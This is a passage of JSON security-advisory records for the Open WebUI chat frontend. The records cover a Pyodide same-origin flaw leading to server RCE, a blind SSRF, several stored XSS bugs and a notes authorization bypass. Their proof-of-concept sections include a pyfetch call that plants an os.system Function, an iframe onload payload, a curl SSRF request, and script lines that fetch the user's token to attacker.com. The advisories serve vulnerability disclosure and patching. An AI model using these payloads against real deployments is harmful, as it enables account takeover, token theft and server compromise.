Credits\n\n@dievus","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-24T16:55:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-7rw5-9f7q-xj36","https://nvd.nist.gov/vuln/detail/CVE-2026-59218","https://github.com/open-webui/open-webui/pull/26385","https://github.com/open-webui/open-webui/commit/993e74912199c66c522f08ec81abe31d76985e39","https://github.com/open-webui/open-webui/releases/tag/v0.10.0","https://github.com/advisories/GHSA-7rw5-9f7q-xj36"],"source_kind":"github","identifiers":["GHSA-7rw5-9f7q-xj36","CVE-2026-59218"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.348Z","epss_percentage":0.00413,"epss_percentile":0.34045,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cnc1LTlmN3EteGozNs4ABfrI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03cnc1LTlmN3EteGozNs4ABfrI","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cnc1LTlmN3EteGozNs4ABfrI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00cjJwLTI3bWgtNW0yMs4ABfrH","url":"https://github.com/advisories/GHSA-4r2p-27mh-5m22","title":"Open WebUI: Stored web worker XSS via Pyodide","description":"**Title:** Same-origin Pyodide code execution allows server-side RCE via a shared chat\n\n### Summary\n\nOpen WebUI runs client-side Python (Pyodide) in a same-origin web worker. Through Pyodide's JavaScript API (`pyodide.http.pyfetch`, or the `js` module which exposes the page's `fetch` / `XMLHttpRequest`) executed Python can issue requests on the application origin, and those requests carry the victim's session cookie. A low-privileged user can store such a payload in a chat message, share the chat, and when a victim opens it and clicks **Run** the payload executes authenticated same-origin requests as the victim. When the victim is an admin (or a user holding `workspace.functions` / `workspace.tools` permissions) the payload creates a Function/Tool whose body runs server-side, yielding **remote code execution**.\n\n### Details\n\nPyodide's `js` bridge gives Python in the worker the same reach as inline JavaScript on the origin, and the worker is same-origin, so a credentialed request to the app's own API is authenticated as the victim. No separate XSS sink is required: storing the payload in a shared chat and having the victim run it is enough.\n\n```python\nfrom pyodide.http import pyfetch\nimport json\nawait pyfetch('/api/v1/functions/create', method='POST', credentials='include',\n              headers={'Content-Type': 'application/json'},\n              body=json.dumps({'id': 'x', 'name': 'x', 'meta': {'description': 'x'},\n                               'content': \"import os; os.system('\u003cattacker command\u003e')\"}))\n```\n\n### Impact\n\nWhen the victim runs the shared code, an authenticated low-privileged user achieves remote code execution on the server (the created Function/Tool runs server-side Python) if the victim is an admin or holds `workspace.functions` / `workspace.tools` permissions. More generally the executed code can issue any authenticated request as the victim. Requires the victim to click Run, and Open WebUI configured to use Pyodide.\n\n### Patched\n\nPyodide now runs in a sandboxed iframe at an opaque origin by default (`sandbox=\"allow-scripts\"`, no `allow-same-origin`). At an opaque origin `pyfetch`, `fetch` and `XMLHttpRequest` to the app become cross-origin requests that carry no session cookie and are CORS-blocked, and the `js` bridge operates on the isolated iframe window with no access to the parent's cookie, token, `localStorage` or DOM. Full Python, JavaScript and external fetch keep working. IDBFS persistence is available only behind `ENABLE_PYODIDE_FILE_PERSISTENCE=true`, which restores the same-origin worker and re-accepts this risk.\n\n### Workaround\n\nUntil upgraded, disable Pyodide code execution or set the Code Execution / Code Interpreter engine to a server-side option.\n\n### Credits\n\n@gg0h","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-24T16:54:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4r2p-27mh-5m22","https://nvd.nist.gov/vuln/detail/CVE-2026-59214","https://github.com/advisories/GHSA-4r2p-27mh-5m22"],"source_kind":"github","identifiers":["GHSA-4r2p-27mh-5m22","CVE-2026-59214"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-24T17:00:09.078Z","updated_at":"2026-09-03T03:00:55.348Z","epss_percentage":0.00286,"epss_percentile":0.20508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjJwLTI3bWgtNW0yMs4ABfrH","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cjJwLTI3bWgtNW0yMs4ABfrH","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.10.0","vulnerable_version_range":"\u003c 0.10.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjJwLTI3bWgtNW0yMs4ABfrH/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qZ3g5LWpyNXgtbXZwds4ABaTo","url":"https://github.com/advisories/GHSA-jgx9-jr5x-mvpv","title":"Open WebUI has Blind Server Side Request Forgery in its Image Edit Functionality","description":"### Summary\nThere is a blind server side request forgery in the functionality that allows editing an image via a prompt. The affected function will perform a GET request on the URL provided by the user. There is no restriction on the domain of the provided URL allowing the local address space to be interacted with. Since the SSRF is blind (the response cannot be read) impact is port scanning of the local network because it can be confirmed if the port is open based on if the GET request failed.\n\n### Details\nThe vulnerability occurs here:\nhttps://github.com/open-webui/open-webui/blob/2b26355002064228e9b671339f8f3fb9d1fafa73/backend/open_webui/routers/images.py#L850-L916\nLine 911 shows the user provided URL passed to the function `load_url_image`. Within this function on line 883 HTTP/HTTPs URLs are trusted blindly and called asynchronously with `requests.get`. \n\n### PoC\nThe vulnerability can be reproduced with the following curl command:\n```\ncurl -X POST http://localhost:3000/api/v1/images/edit \\\n  -H \"Authorization: Bearer \u003ctoken\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"form_data\":{\n    \"image\": \"\u003curl\u003e\",\n    \"prompt\": \"poc\"}\n  }'\n```\n\n### Impact\nResponse differentials can be used to port scan the local network:\n\u003cimg width=\"3016\" height=\"736\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93b4df52-b23c-4ed7-a5fa-9cbedb30091c\" /\u003e\nThis can be automated to iterate through the entire port range to determine open ports. If the service running on an open port can be inferred the user may be able to interact with it in a meaningful way if the service offers any state changing GET request endpoints.\n\n### Remediation\nRestrict provided URLs from local address space.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-07T16:51:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jgx9-jr5x-mvpv","https://nvd.nist.gov/vuln/detail/CVE-2026-34225","https://github.com/advisories/GHSA-jgx9-jr5x-mvpv"],"source_kind":"github","identifiers":["GHSA-jgx9-jr5x-mvpv","CVE-2026-34225"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-07T17:00:09.169Z","updated_at":"2026-09-03T03:01:22.119Z","epss_percentage":0.00292,"epss_percentile":0.21152,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZ3g5LWpyNXgtbXZwds4ABaTo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qZ3g5LWpyNXgtbXZwds4ABaTo","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.7.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZ3g5LWpyNXgtbXZwds4ABaTo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12am03LW00eGgtN3dyY84ABaTn","url":"https://github.com/advisories/GHSA-vjm7-m4xh-7wrc","title":"Open WebUI vulnerable to Stored XSS via iFrame embeds in response messages","description":"### Summary\nManually modifying chat history allows setting the `embeds` property on a response message, the content of which is loaded into an iFrame with a sandbox that has `allow-scripts` and `allow-same-origin` set, ignoring the \"iframe Sandbox Allow Same Origin\" configuration. This enables stored XSS on the affected chat. This also triggers when the chat is in the shared format. The result is a shareable link containing the payload that can be distributed to any other users on the instance.\n\n### Details\nThe flaw stems from how iFrames are constructed here:\nhttps://github.com/open-webui/open-webui/blob/6f1486ffd0cb288d0e21f41845361924e0d742b3/src/lib/components/chat/Messages/ResponseMessage.svelte#L689-L703\n\n`messages.embeds` is a user controlled property and so can be arbitrarily set by the user to a payload of their choosing. Since `allowScripts` and `allowSameOrigin` are harcoded as true here the sandboxing offers essentially no protection.\n\n### PoC\nCreate an arbitrary chat:\n\u003cimg width=\"2468\" height=\"1426\" alt=\"image\" src=\"https://github.com/user-attachments/assets/41e32f5c-3fa7-4208-a71f-85556eec6309\" /\u003e\nEdit the model response:\n\u003cimg width=\"632\" height=\"192\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b1e79303-360f-46e3-8d6d-3309c3ec30af\" /\u003e\n\u003cimg width=\"2150\" height=\"434\" alt=\"image\" src=\"https://github.com/user-attachments/assets/78f19d7f-10dc-4e91-83cc-2d4811e58496\" /\u003e\nBefore saving, configure the browser to use an HTTP proxy tool (Burp/Caido/ZAP) and intercept the save request. Find the object within the `history` and then `messages` objects (not the `messages` array) that corresponds to the edited text.\n\u003cimg width=\"2024\" height=\"1528\" alt=\"image\" src=\"https://github.com/user-attachments/assets/953e5368-8e93-428b-b223-c695eacfe7b9\" /\u003e\nOn this object, add an `embeds` key and list value as shown below, forward the request and refresh the page.\n\u003cimg width=\"1904\" height=\"1530\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0e56be6f-5513-490e-9961-972bdfbd5d8b\" /\u003e\nThis results in XSS via the controlled content getting rendered in the iFrame. Note the bold text is just to aid demonstration. `console.log` is used to prove JS execution because the lack of `allow-modals` on the iFrame sandbox prevents alerts. \n\u003cimg width=\"2752\" height=\"1686\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4858f7b3-4e2f-4fab-a5a5-196df26bcdce\" /\u003e\nThe same payload triggers when the chat is shared.\n\u003cimg width=\"2730\" height=\"1426\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ee88b538-9781-4276-b681-9953974b826d\" /\u003e\n\n### Impact\nAny user can create a weaponised chat that can be shared and subsequently used to target other users.\n\nLow privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.\n\nAdmins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-07T16:51:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-vjm7-m4xh-7wrc","https://nvd.nist.gov/vuln/detail/CVE-2026-26193","https://github.com/open-webui/open-webui/blob/6f1486ffd0cb288d0e21f41845361924e0d742b3/src/lib/components/chat/Messages/ResponseMessage.svelte#L689-L703","https://github.com/advisories/GHSA-vjm7-m4xh-7wrc"],"source_kind":"github","identifiers":["GHSA-vjm7-m4xh-7wrc","CVE-2026-26193"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-07T17:00:09.170Z","updated_at":"2026-09-03T03:01:22.120Z","epss_percentage":0.00194,"epss_percentile":0.09378,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12am03LW00eGgtN3dyY84ABaTn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12am03LW00eGgtN3dyY84ABaTn","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.44","vulnerable_version_range":"\u003c= 0.6.43"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12am03LW00eGgtN3dyY84ABaTn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14YzhwLTlycjYtOTdyMs4ABaTm","url":"https://github.com/advisories/GHSA-xc8p-9rr6-97r2","title":"Open WebUI vulnerable to Stored XSS via iFrame in citations model","description":"### Summary\nManually modifying chat history allows setting the `html` property within document metadata. This causes the frontend to enter a code path that treats document contents as HTML, and render them in an iFrame when the citation is previewed. This allows stored XSS via a weaponised document payload in a chat. The payload also executes when the citation is viewed on a shared chat.\n\n### Details\nThe vulnerability stems from how iFrame are implemented here:\nhttps://github.com/open-webui/open-webui/blob/6f1486ffd0cb288d0e21f41845361924e0d742b3/src/lib/components/chat/Messages/Citations/CitationModal.svelte#L163-L170\nThe `html` attribute can be controlled by a user who manually edits the chat history. Since `allow-scripts` and `allow-same-origin` are harcoded here the sandboxing offers essentially no protection.\n\n### PoC\nCreate an arbitrary chat with a file upload attached:\n\u003cimg width=\"2462\" height=\"1148\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fad83c74-036d-41b8-bc44-87bf2a538b21\" /\u003e\nEdit the response\n\u003cimg width=\"768\" height=\"206\" alt=\"image\" src=\"https://github.com/user-attachments/assets/41a7342a-cc41-433e-8820-0bc6ed08ddd7\" /\u003e\n\u003cimg width=\"2142\" height=\"796\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fb731111-e082-4172-80d1-34cff6b2a511\" /\u003e\nBefore saving, configure the browser to use an HTTP proxy tool (Burp/Caido/ZAP) and intercept the save request. Find the object within the `history` and then `messages` objects (not the `messages` array) that contains the document source.\n\u003cimg width=\"2122\" height=\"1388\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1b4fbced-a6de-414d-b063-9cae44e3f449\" /\u003e\nAdd `html: true` to metadata, update the document to an XSS payload, and forward the request.\n\u003cimg width=\"2240\" height=\"1358\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fd27971b-f707-458f-a14d-254f9f3ad1fa\" /\u003e\nObserve the payload is rendered in the iFrame and the javascript executes.\n\u003cimg width=\"2698\" height=\"1696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b4e31cb4-d4cc-41a9-be42-802e9b1a798d\" /\u003e\nThe payload also executes when viewed from a shared version of the chat.\n\u003cimg width=\"2742\" height=\"1258\" alt=\"image\" src=\"https://github.com/user-attachments/assets/92ee501d-8f14-4c32-8f3c-f4d3ca304ee5\" /\u003e\n\n\n### Impact\nAny user can create a weaponised chat that can be shared and subsequently used to target other users.\n\nLow privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.\n\nAdmins are at risk of exposing the server to RCE via same chain described in https://github.com/advisories/GHSA-w7xj-8fx7-wfch.\n\n### Caveats\nThe victim must expand the sources and click the document containing the payload to trigger this issue.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-07T16:51:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-xc8p-9rr6-97r2","https://nvd.nist.gov/vuln/detail/CVE-2026-26192","https://github.com/open-webui/open-webui/blob/6f1486ffd0cb288d0e21f41845361924e0d742b3/src/lib/components/chat/Messages/Citations/CitationModal.svelte#L163-L170","https://github.com/advisories/GHSA-xc8p-9rr6-97r2"],"source_kind":"github","identifiers":["GHSA-xc8p-9rr6-97r2","CVE-2026-26192"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-07T17:00:09.170Z","updated_at":"2026-09-03T03:01:22.121Z","epss_percentage":0.00194,"epss_percentile":0.09174,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14YzhwLTlycjYtOTdyMs4ABaTm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14YzhwLTlycjYtOTdyMs4ABaTm","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.7.0","vulnerable_version_range":"\u003c 0.7.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14YzhwLTlycjYtOTdyMs4ABaTm/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05ZjRmLWp2OTYtODc2Ns4ABaTl","url":"https://github.com/advisories/GHSA-9f4f-jv96-8766","title":"Open WebUI vulnerable to stored XSS via unescaped markdown token in MarkdownTokens.svelte leading to full account takeover and RCE via functions","description":"### Summary\n\nA vulnerability in the way certain html tags in chat messages are rendered allows attackers to inject JavaScript code into a chat transcript. The JavaScript code will be executed in the user's browser every time that chat transcript is opened, allowing attackers to retrieve the user's access token and gain full control over their account. Chat transcripts can be shared with other users in the same server, or with the whole open-webui community if \"Enable Community Sharing\" is enabled in the admin panel.\n\nIf this exploit is used against an admin user, it is possible to achieve Remote Code Execution on the server where the open-webui backend is hosed. This can be done by creating a new function which contains maliicious python code.\n\n**This vulnerability also affects chat transcripts uploaded to `https://openwebui.com/c/\u003cuser\u003e/\u003cchat_id\u003e`, allowing for wormable stored XSS in https://openwebui.com**\n\n### Details\n\n### Stored XSS\n\nThe file https://github.com/open-webui/open-webui/blob/main/src/lib/components/chat/Messages/Markdown/MarkdownTokens.svelte#L269-L279 contains the following code:\n```TypeScript\n\t\t{:else if token.text.includes(`\u003ciframe src=\"${WEBUI_BASE_URL}/api/v1/files/`)}\n\t\t\t{@html `${token.text}`}\n``` \nThat code checks if a chat message has an html tag which contains the text `\u003ciframe src=\"${WEBUI_BASE_URL}/api/v1/files/`, and if so, it renders that html tag using `{@html}`, which is a dangerous Svelte functionality that allows text to be rendered as HTML code.\n\nAttackers can abuse this by sending a chat message with the following payload:\n`\u003ciframe src=\"http://localhost:8080/api/v1/files/\" onload=\"alert(1)\"\u003e\u003c/iframe\u003e`, where `http://localhost:8080` is the URL where the open-webui backend server is hosted.\n\nThis will cause a JavaScript alert window to be displayed every time that chat transcript is opened.\n\n![image](https://github.com/user-attachments/assets/1e7da1f9-4154-402a-b5f1-4a50a0b4a227)\n![image](https://github.com/user-attachments/assets/f8f463c7-731a-41e0-9e75-c2747639bc5f)\n\nIn a real attack scenario, instead of injecting `alert(1)` in the `onload` attribute, attackers can use the following code to steal the user's access token and send it to a server they control:\n`fetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))`\n\nThis is possible because the access token is stored inside the user's localStorage, which is accessible by JavaScript.\n\nThen, once the attacker has created a chat transcript which contains that payload, they can share that transcript with other users on the same server by clicking on the 3 dots next to the chat transcript on the left, and clicking \"Share\"\n\n![image](https://github.com/user-attachments/assets/200e3ab1-36d9-4d0c-a869-dd60ae112fc9)\n\n**If \"Enable Community Sharing\" is enabled in the admin panel. attackers can upload the infected chat transcript to https://openwebui.com/, where the Stored XSS payload will be executed**\n\n![image](https://github.com/user-attachments/assets/b9bab780-5fc2-439c-9875-d08cedadd99b)\n\nThis makes the exploit a **wormable Stored XSS**. Attackers can upload an infected chat to their profile which has JavaScript code to upload a similar infected chat to the visitori's profile, share it with other members of the open-webui community, and infect their profiles as well.\n\n\u003chr\u003e\n\n### RCE\n\nIf an attacker manages to steal an admin user's token, they can then achieve RCE on the backend server by creating a function (http://localhost:5174/admin/functions), which by design allows admins to execute arbitrary python code on the backend server.\n\nThe following HTTP request can be sent to the backend server to execute arbitrary python code.\n\n![image](https://github.com/user-attachments/assets/572a1594-cb39-4232-a834-efe625fd3667)\n![image](https://github.com/user-attachments/assets/c5b34773-759d-4f0d-9ed8-0b5078e24d1f)\n\n\n### PoC\n\nAttackers can abuse this by sending a chat message with the following payload:\n`\u003ciframe src=\"http://localhost:8080/api/v1/files/\" onload=\"alert(1)\"\u003e\u003c/iframe\u003e`, where `http://localhost:8080` is the URL where the open-webui backend server is hosted.\n\n### Impact\n\nAttackers can send a a link to a shared chat transcript to other users on the same server to take control over their accounts. They can also upload the chat to https://openwebui.com and take control over other users' accounts.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-07T16:50:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-9f4f-jv96-8766","https://nvd.nist.gov/vuln/detail/CVE-2025-46719","https://github.com/open-webui/open-webui/commit/6fd082d55ffaf6eb226efdeebc7155e3693d2d01","https://github.com/open-webui/open-webui/blob/main/src/lib/components/chat/Messages/Markdown/MarkdownTokens.svelte#L269-L279","https://github.com/open-webui/open-webui/releases/tag/v0.6.6","https://github.com/advisories/GHSA-9f4f-jv96-8766"],"source_kind":"github","identifiers":["GHSA-9f4f-jv96-8766","CVE-2025-46719"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-07T17:00:09.170Z","updated_at":"2026-09-03T03:01:22.121Z","epss_percentage":0.00525,"epss_percentile":0.42518,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZjRmLWp2OTYtODc2Ns4ABaTl","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05ZjRmLWp2OTYtODc2Ns4ABaTl","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.6","vulnerable_version_range":"\u003c 0.6.6"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05ZjRmLWp2OTYtODc2Ns4ABaTl/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04Z2g1LXFxaDgtaHEzeM4ABaTk","url":"https://github.com/advisories/GHSA-8gh5-qqh8-hq3x","title":"Open WebUI  allows limited stored XSS vila uploaded html file","description":"### Summary\nLow privileged users can upload HTML files which contain JavaScript code via the `/api/v1/files/` backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability.\n\n### Details\n\nThe following HTTP request can be sent to the backend server to upload a file with the contents:\n`\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e`\n\n```http\nPOST /api/v1/files/ HTTP/1.1\nHost: localhost:8080\nContent-Length: 286\nauthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm\n\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm\nContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\nContent-Type: text/html\n\n\u003ch1\u003epadding\u003c/h1\u003e\n\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm--\n```\n\nNote the `filename=\"test.html\"` , `Content-Type: text/html`, and `\u003ch1\u003epadding\u003c/h`\u003e in the request's body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a `\u003cscript\u003e` tag. \n\nThe backend server responds to the above request with JSON data that contains an `id` parameter. \n\n![image](https://github.com/user-attachments/assets/ac15e108-d385-4e58-b29a-eb79aafbffda)\n\nThis ID can be used to view the uploaded file in the browser at `\u003cBackend_URL\u003e/api/v1/files/\u003cfile_id\u003e/content/html`\n\nBecause of the authorization checks done on lines https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438, this file can only be viewed by admins and the user that uploaded it, but not by other low-privileged users, thus limiting the imact of this stored XSS vulnerability.\n\n### PoC\n\nFirst, upload an html containing JavaScript code to the backend server using the following HTTP request:\n```http\nPOST /api/v1/files/ HTTP/1.1\nHost: localhost:8080\nContent-Length: 286\nauthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm\n\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm\nContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\nContent-Type: text/html\n\n\u003ch1\u003epadding\u003c/h1\u003e\n\u003cscript\u003efetch(\"https://attacker.com/?token=\" + localStorage.getItem(\"token\"))\u003c/script\u003e\n------WebKitFormBoundaryr0PnRBBHKXD9UEdm--\n```\n\nThen copy the `id` from the response and use it to view the file in the browser at `\u003cBackend_URL\u003e/api/v1/files/\u003cfile_id\u003e/content/html`\n\n\n### Impact\n\nLow privileged users can upload HTML files containing malicious JavaScript code. A link to such a file can be sent to an admin, and if clicked, will give the low-privileged user complete control over the admin's account, ultimately enabling RCE via functions, as described in https://github.com/open-webui/open-webui/security/advisories/GHSA-9f4f-jv96-8766","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-07T16:50:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-8gh5-qqh8-hq3x","https://nvd.nist.gov/vuln/detail/CVE-2025-46571","https://github.com/open-webui/open-webui/commit/ef2aeb7c0eb976bac759e59ac359c94a5b8dc7e0","https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438","https://github.com/open-webui/open-webui/releases/tag/v0.6.6","https://github.com/advisories/GHSA-8gh5-qqh8-hq3x"],"source_kind":"github","identifiers":["GHSA-8gh5-qqh8-hq3x","CVE-2025-46571"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-07T17:00:09.170Z","updated_at":"2026-09-03T03:01:22.122Z","epss_percentage":0.00345,"epss_percentile":0.27235,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Z2g1LXFxaDgtaHEzeM4ABaTk","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04Z2g1LXFxaDgtaHEzeM4ABaTk","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.6","vulnerable_version_range":"\u003c 0.6.6"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Z2g1LXFxaDgtaHEzeM4ABaTk/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04Nzg4LWo2OHItM2NnaM4ABY4q","url":"https://github.com/advisories/GHSA-8788-j68r-3cgh","title":"Open WebUI: Any authenticated user can read other users' private notes via Socket.IO","description":"### Summary\n\nThe `ydoc:document:join` Socket.IO handler checks note ownership only when the `document_id` starts with `note:` (colon). However, the `YdocManager` storage layer normalizes all document IDs by replacing colons with underscores (`document_id.replace(\":\", \"_\")`). An attacker can join a document room using `note_\u003cid\u003e` (underscore) instead of `note:\u003cid\u003e` (colon), bypassing the authorization check entirely while accessing the same underlying Yjs document. The server then returns the full document state, leaking the victim's private note contents.\n\n### Details\n\nThe `ydoc:document:join` handler in `socket/main.py` (line 511) only performs authorization for document IDs matching the `note:` prefix:\n\n```python\n@sio.on(\"ydoc:document:join\")\nasync def ydoc_document_join(sid, data):\n    document_id = data[\"document_id\"]\n\n    if document_id.startswith(\"note:\"):\n        note_id = document_id.split(\":\")[1]\n        note = Notes.get_note_by_id(note_id)\n        # ... ownership and AccessGrants check ...\n        # Returns early if user doesn't have access\n\n    # If document_id does NOT start with \"note:\", execution continues\n    # with no authorization check at all\n\n    await YDOC_MANAGER.add_user(document_id=document_id, user_id=sid)\n    await sio.enter_room(sid, f\"doc_{document_id}\")\n\n    ydoc = Y.Doc()\n    updates = await YDOC_MANAGER.get_updates(document_id)\n    for update in updates:\n        ydoc.apply_update(bytes(update))\n\n    state_update = ydoc.get_update()\n    await sio.emit(\"ydoc:document:state\", {\n        \"document_id\": document_id,\n        \"state\": list(state_update),\n    }, room=sid)\n```\n\nThe `YdocManager` class in `socket/utils.py` normalizes document IDs in every method by replacing colons with underscores:\n\n```python\nasync def get_updates(self, document_id: str) -\u003e List[bytes]:\n    document_id = document_id.replace(\":\", \"_\")  # line 176\n    # ... returns updates keyed by normalized ID\n\nasync def append_to_updates(self, document_id: str, update: bytes):\n    document_id = document_id.replace(\":\", \"_\")  # line 134\n    # ... stores update keyed by normalized ID\n```\n\nThis means `note:abc123` and `note_abc123` resolve to the same storage key (`note_abc123`). When a victim opens their 